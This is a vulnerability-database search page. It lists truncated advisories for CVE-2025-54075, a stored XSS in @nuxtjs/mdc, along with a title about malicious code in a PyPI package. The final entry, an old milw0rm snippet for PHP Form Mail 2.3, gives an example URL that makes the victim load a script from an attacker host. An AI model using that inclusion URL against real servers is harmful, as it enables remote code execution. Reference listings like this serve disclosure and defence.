11 matches found
EUVD-2025-21892
Malicious code in bioql PyPI...
Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering
Summary A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and...
GHSA-CJ6R-RRR9-FG82 Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering
Summary A remote script-inclusion / stored XSS vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and...
CVE-2025-54075
MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative...
CVE-2025-54075
MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative...
CVE-2025-54075
Summary: CVE-2025-54075 affects @nuxtjs/mdc (Nuxt MDC) before version 0.17.2, where Markdown rendering allows a remote script-inclusion / stored XSS via injecting a tag. The vulnerability rewrites how subsequent relative URLs are resolved, enabling loading of scripts, styles, or images from atta...
CVE-2025-54075 mdc vulnerable to XSS in markdown rendering bypassing HTML filter. (N°4)
MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative...
CVE-2025-54075 mdc vulnerable to XSS in markdown rendering bypassing HTML filter. (N°4)
MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative...
CVE-2025-54075 mdc vulnerable to XSS in markdown rendering bypassing HTML filter. (N°4)
MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to version 0.17.2, a remote script-inclusion / stored cross-site scripting vulnerability in @nuxtjs/mdc lets a Markdown author inject a element. The tag rewrites how all subsequent relative...
PT-2025-30053 · Unknown · @Nuxtjs/Mdc
Name of the Vulnerable Software and Affected Versions: @nuxtjs/mdc versions prior to 0.17.2 Description: A remote script-inclusion / stored cross-site scripting issue exists in @nuxtjs/mdc. A Markdown author can inject a element, which rewrites how relative URLs are resolved. This allows an...
PHP Form Mail 2.3 - Arbitrary File Inclusion
Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...